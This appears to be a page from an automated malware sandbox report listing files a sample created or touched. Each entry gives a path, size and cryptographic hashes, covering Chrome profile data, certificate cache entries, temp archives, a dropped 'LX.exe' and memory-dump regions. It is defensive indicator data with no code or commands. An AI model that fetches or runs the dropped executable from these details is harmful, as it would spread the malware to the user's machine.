bc342ffa7180850d9c5e82c4b087060cb3bcb4515c03305465d5a599f41425e4585e6faf1367e37317a56f4ad2d5cde31719cae34dd4ccccbb18150b9ec5340a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a07052f3a82feb29f52ade570e0e197a

SHA1
184f0089996e979acb2859b6e90feb1bf7c740cc

SHA256
d078d05d5d7c1ddf897b7844d070df412732322186cfe6681cc60501d852bfaf

SHA512
36716c42eb992b9c4ee1bfdc52dbfe98f6ea67fc374605d6c3e303db113706720340fd313e43bebd54d8edffac55e2f36e4f96154725976d622d9244c1dbf1c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e46614c3c82ea7e72c64da5c53ae0bb8

SHA1
8aa82a19cf89b792eb026be09dd6073e614708c0

SHA256
f7da17de7ec65894445f9cb119fd90c9ba6978bcd84290b30bc4044cf20970bd

SHA512
cf3457b673d44161c530a0ed46123b480e5d837c0d3dc695460d9357155b5a37b15d09659600db62d5abe967f61cea4bcf8da8489dcbd8a930fdc992c86891c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
23e29a645102b753eba21ddfe990aaa4

SHA1
3d9deb7afcc2490fa1543543d11255e1292a5ad8

SHA256
2af320c2464db9cda4ea7be9355e9d3108984585131700fae16c4637f4886c68

SHA512
45a6b867cc13d0b66b2afe9c9a8ef1b801c6876a1affeb67613bf8967059884a0c2dea73667833161eaf23834e49f84b3c00e46a443a21b03b9144899a8900fb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
daf5dc112e81cbba7c8044dd90016b1b

SHA1
5eda4fa3d87b5939629ef5d562fb9450bb542270

SHA256
e8cc6eff6b67f07476fd8700999c00dd11281791315bdc2f0279ff8d797142ea

SHA512
9675b9545ae572677477ad8e5bf8ad345072d8ca78af64417bc1f93db89b24cd5781e1d087c4a46050c3c6640c5bc3a651adc7e6c8d700533ad15c7f19396f98

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bbcb5fc4527a78399f49caee86896e05

SHA1
c665e5c3cbe45d4e68f2d14a516a0661226940f3

SHA256
9223b68e9199589b85512c5d38d3276716c7a1734c6d5f168ad836c3539f00e0

SHA512
a2f2848525c5cf3bb77c11f2c10d57ed59674510158fd2770a67cbb973d23104ec0a0c4e57ca5fccb116048d0f12be12c598ae8f404089dc6b58beb589ef447d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4c75a8d3f41338402e7d424b2080f2d9

SHA1
ace684202cc42ae2174abd5b17059b85c5c4a941

SHA256
ed9082e83becdf762bd96982812e2fc72ba85a4e0a3a71f2a67fe4a79e173c60

SHA512
183c51b2f67709c3e9c9c253c0fdc1c7411a98a8c8a801cffc71eba6450e95ee80cd7d53966ce47406a7dfe0c158de096c9af5060f70c18767a5b2417ecb60ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\8e3bcefa-b9bd-4789-a396-6e9554f5f60e.tmp

Filesize
348KB

MD5
81d7b33dd5373a76cd7388fc66fcf814

SHA1
1cb10d149e4aec22ddbc884274bdb631d2ec39c6

SHA256
117ff1ba10b6717c741379027ef35832a957d368bfdaf1c377520574b6a159c5

SHA512
3b0c870f755e196706ddabe50cb440ac81a7b8212ac365ee568ee6fc62fb233500ddd9c9f3ca4cdeaf46bfedfb07970f9e18585bfb392e25c5412c216fec5cbf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
361B

MD5
1597719e5a8cce41da310b382dafe6b4

SHA1
adfa57c2ed3e14b1f3c274611812a8c24a4b7ec4

SHA256
09c716d1cdaea9f9a879254c23083aed93a27381d1b8209c61dd501257501fd7

SHA512
18bd1e88a469bed57b77d4b749c53253149cd75bb4ba933320e217c1a93dee112ac24f556907336b6bcdd61bd202e02ba974121d11c3d50d9ab029876afb0acf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
f38b04f72694a4483188cfedb5a8b7dd

SHA1
1a461e9eeab963fbc2de27aaa69db5c732c663bf

SHA256
9158862b1d48f8b5af67101d85025ccc07e01dde807d47f74322bb23809f216b

SHA512
8e70c26c4534784b6c4638ca5cade31a7ed0c79a1849cc79e8d147c4617395d82dbfb88b51a83400fda509ded42fcf2b12d62c3828324c9fdd496050e776ba83

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
e9abf9d39e0a5e0625fea1b96844be66

SHA1
948e26785aab8096443ed3bcabccbc940dafa5d0

SHA256
07d60558c8c6573c6a497669bd256374fb9f07c0d4e95c528ee7921f8fe7e5b7

SHA512
59273869cf919f7cca0ea790570b26136a3e0af2fa4526261359362241bef6f29af76d5fcd395a4a02a6d7654adb58c473f8d30a359438ad4a69f330d7d844aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT~RFf78c081.TMP

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
335KB

MD5
41e6ff78233bb3d402940f4d0bfdfd01

SHA1
667a43365caef14fe214f0562895a649cc6bbeb8

SHA256
d496db4cf183725eb4d0de27907e86b1ef62f1801b95d4c6bdd4ea434a626300

SHA512
613913a6a4190a3c2c48ffac943dab1e42b85b2facabe61d8867b7fbbeef2f49488169902b1e0db44adf1c37103aefdd8b25a45dea67ef200d1b57e272cd2e9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3DEC.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3E0F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
23858173dc1e2ba9887df70f2b12a190

SHA1
15dcde748374ebd458157d028a7018a01c4ea85d

SHA256
8ecbe5a81d93015360f59b4269a1320dfec05b8cf3973d4384a1bdbc749fbdf2

SHA512
7eb48770232993d758b0094da0fe6914181d5a94150c1ed2ca8747aea0aa8a5388c7e31ff06e1f83b96db52d5547ffedc5094d053463b4f93bb6fc6a69e1b1ed

Download Submit
\Users\Admin\AppData\Local\Temp\LX.exe

Filesize
74KB

MD5
1ab3092297d1806397e8d3a6747a3271

SHA1
ea114a2e5ddee915d30458031ec5ced7f97d1650

SHA256
2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

SHA512
1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

Download Submit
memory/2748-8-0x0000000000A40000-0x0000000000A58000-memory.dmp

Filesize
96KB

Download
memory/2748-7-0x000007FEF5A83000-0x000007FEF5A84000-memory.dmp

Filesize
4KB

Download
memory/2756-14-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2756-13-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2976-5-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download